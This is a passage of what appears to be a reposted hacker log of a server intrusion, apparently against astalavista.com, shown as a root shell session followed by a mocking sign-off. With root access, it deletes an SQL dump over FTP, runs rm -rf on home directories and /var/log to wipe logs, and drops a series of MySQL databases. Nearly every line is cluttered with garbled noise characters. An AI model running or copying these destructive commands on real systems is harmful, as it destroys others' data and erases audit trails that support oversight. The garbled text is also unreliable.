; b7 L- {3 h* x-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
8 ], C/ G0 Z# Z[snip]" Q" [4 g4 y$ k
226 Transfer complete.
% O h" B. {% i8 F1 cftp> mdelete *
) c( y" q& O0 B( {0 Zftp> ls -la1 U' ]3 N" b6 s& X& y& H5 L$ W& l
227 Entering Passive Mode (212,254,194,163,2,193)* o6 u# Z$ p M% R/ d
150 Opening BINARY mode data connection for ‘file list’.* t7 q4 q9 J0 O, }4 E- g
226 Transfer complete.1 q1 E: j* P6 _# J4 F
ftp>' g' R% R% g1 T% X6 ?5 n7 |- U# i! r
+ G' e; t( l) o% A6 T& k. h% C$ `sh-3.2# cd /home
/ ~3 r+ k- e+ ?, Q; x" Ush-3.2# ls -la
2 [2 f7 u3 S# q% v! ktotal 120
6 S! d' j7 U* K+ t: ` Jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .; G9 c9 J4 Q D) p+ H, H3 x
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* `. M! `* g/ a# w: Q/ Y
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
4 Z: ~; p- t3 w/ R-rw——- 1 root root 8192 Jun 4 03:03 aquota.group4 e R4 W4 R' _) _ A c. Y# t
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user$ [2 g Q2 e" r% F- |( o* P9 l
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet; P. Y V4 E% w$ j4 q9 Q0 B! l
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
5 ^" d# L# N( ?* Xdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
9 w4 F8 U9 {: v% \; vdrwx–x–x 10 com com 4096 Apr 28 12:40 com
4 t. a3 F7 ]# u2 Edrwxr-xr-x 2 root root 4096 May 17 2007 ftp
* w( {' }1 w! Z8 j# {, Hdrwx—— 3 jon jon 4096 Sep 21 2007 jon
* p! {0 u% x# Y3 [( W) Wdrwx—— 2 root root 16384 Sep 11 2007 lost+found
8 t! [" S3 Z: `& I8 Ddrwxr-xr-x 2 root root 4096 Sep 14 2007 my4 Q! b" G) l$ C( X
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
' C4 c6 A# S. A+ S0 }8 Sdrwx—— 2 jon jon 4096 Sep 15 2007 test- D; u! R) ?0 T( @
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
1 J5 I+ z- I" p+ x8 S9 L }/ v( b6 f* U
sh-3.2# rm -rf backup/
/ W) W U" Q$ P/ k; }9 i% ?sh-3.2# rm -rf backup.14161/
* n0 s; {# G! H+ lsh-3.2# rm -rf ftp/6 B: O% B2 q- C/ N2 D' ~
sh-3.2# rm -rf jon/
* [) P3 g# e3 J- {% ~& |' } I8 ^( ish-3.2# rm -rf my/
- Y3 y* m1 @0 t& h, esh-3.2# rm -rf mysqldata/5 [$ m$ R! ]: Y! Z: i
sh-3.2# rm -rf test/
: L ~4 O) d; y! Q8 M bsh-3.2# rm -rf tmp/
* R2 ^$ }2 N0 v Fsh-3.2# cd ~# o) A) |8 }! M! V6 j5 {
sh-3.2# rm -rf *( @" m% I4 v0 O, y3 c7 E) O
sh-3.2# rm -rf /var/log/; Y- g7 i' T. U6 W& G' {
rm: cannot remove directory `/var/log//proftpd’: Directory not empty% \+ D; X$ i* t. k6 F
sh-3.2# rm -rf /home/*! N3 _+ V7 u: z
sh-3.2# mysql
3 T, f( K& N) B" l, M2 C* @Welcome to the MySQL monitor. Commands end with ; or \g.
& C3 a& i: J& x; ~4 G* oYour MySQL connection id is 4071561 I+ e0 D/ c2 R$ }- w
Server version: 5.0.45-community-log MySQL Community Edition (GPL)8 U' s/ Q; W" s' [2 O
" z9 Z# ~1 i$ ~! H3 ~. Q& _; ZType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
# N+ }/ ?: m2 }& S/ z
b8 j& V5 m7 t" S# G$ [mysql> show databases; l. z/ Q3 k% K. d: d
+———————–+% P {1 [& k) N B
| Database |
$ R1 G& l/ O$ } C5 l! h" L8 w$ Z+———————–+
7 }; V& K9 X2 J4 l; }, }1 c| information_schema |
0 |# t# b+ p ^. e; @| astanet_ads |
+ a) C) k7 s1 j7 [: g+ @8 L4 Y: X| astanet_mailing_lists |8 W: j% e! l3 Q
| astanet_mediawiki | I6 o9 k" w' c) \# \/ ^: X; }: w
| astanet_membersystem |
0 a l& _' w/ a0 W! n X| com_contrexx |
, J3 M+ L) ]; e3 }6 ^| com_contrexx2 |
5 ?7 [) r2 Q) _1 k0 ^, R# t| com_contrexx2_live |- O% ~( o: A8 a, ~, z% w% g
| da_roundcube |
+ x5 v$ \5 J7 x, n1 p7 \6 p| dolphin |
* n: r u3 `! ?0 V, K6 || ideapool |9 X* T1 A; r; b
| mysql |
% J7 y) S+ n/ ]% o" g. L$ }8 Z9 W| test |
. H2 x. o8 M$ F4 Q- p% m| yourmaster |. ]+ J3 T2 V0 d# p4 _6 V/ i& x
+———————–+
4 J5 I* r% o) H: v6 q4 A14 rows in set (0.03 sec)
, n3 F2 _1 Z% L# ?8 ^& Y; B: J; a8 {: j$ [! e- u8 M% {
mysql> drop database astanet_membersystem;5 \" ^, t, _6 v. r' Q ]
droQuery OK, 46 rows affected (0.81 sec)
4 Q& g- a3 ^0 W* S( P. B
! }! E( l/ t( a3 L3 Cmysql> drop database com_contrexx;
( L }- p# q6 P1 ^% Q* y0 l( |Query OK, 211 rows affected (2.72 sec)
$ d. G! U! Z$ q* r, T# {
+ H" s1 d1 H+ W6 E9 C# q0 r' ymysql> drop database com_contrexx2;
% u& B e% g1 |0 p* p" yQuery OK, 237 rows affected (2.23 sec)
% m) }- @+ T2 g) K
/ ^; I9 L O2 Z2 A/ V* ?2 Bmysql> drop database com_contrexx2_live;" w, Y8 m0 o9 M. P3 r4 t
Query OK, 227 rows affected (7.63 sec)+ Q6 x7 g) V( O$ ?5 l% c& ~
9 K% v6 o. ]1 h$ S5 Amysql> drop database ideapool;) k' ^7 ~6 R* g! @
Query OK, 69 rows affected (0.19 sec): m$ J* {9 v$ z
& q" }2 |! y# E% ?# [/ c. Wmysql> drop database yourmaster;1 L( ~) b, U6 Q" ?3 z; b7 X
Query OK, 158 rows affected (0.55 sec)
9 d3 F& Q3 V( |6 T n8 u5 S; m
' }( k3 A# I* K! Smysql> drop database astanet_ads;, l5 S- e& u+ a& T" W; Z% T
Query OK, 9 rows affected (0.11 sec)( `1 }, z$ o9 P4 F: o. p
0 z! Q1 ~% l8 B' K& R/ w
mysql> drop database astanet_mailing_lists;
- T% y2 q# N% A# K8 l: QQuery OK, 24 rows affected (1.47 sec)$ i* f2 A, v. o ^6 d
3 j5 S( [, ?( ?7 I7 X- d8 s
mysql> drop database astanet_mediawiki;. e7 u5 |7 T, M! o7 K1 d0 @' _2 t
Query OK, 31 rows affected (0.51 sec). C* R4 O. }- e
' j9 m* u" `6 g. i3 n" H( {mysql> show databases;
; C r3 W& [1 _9 \( K+——————–+
0 b9 [3 v% M3 }4 e2 N| Database |
) Q. w7 m8 _" r: c: [; ] l9 N. [+——————–+
5 h2 Y( n- P. A0 o| information_schema |
5 W; e2 P8 m% L2 H| da_roundcube |
. u* \4 }2 H2 i1 A1 q" f| dolphin |# Z1 y Z! E/ e1 B N& f) G s) ?$ z
| mysql |& ^3 ~1 H, H) z( U, X
| test |$ U$ ]$ n: a* F
+——————–+
* {1 N- J( f! ?$ T7 F5 rows in set (0.00 sec)
- e& V6 x3 [6 ^6 B$ H; t
6 |/ n9 V: N5 C+ m7 x( `What a journey! We’re not sure exactly why the “Terminator” had any influence on
. K5 M4 @, ^ U, Q7 L) Ytheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the t6 o) w$ R p5 Y6 t0 j
wrong to say this pack of morons *wont be back*.
4 b; U1 i+ @3 a( f" b6 r% V |
发表于 2012-11-6 21:07:34
收藏
支持
反对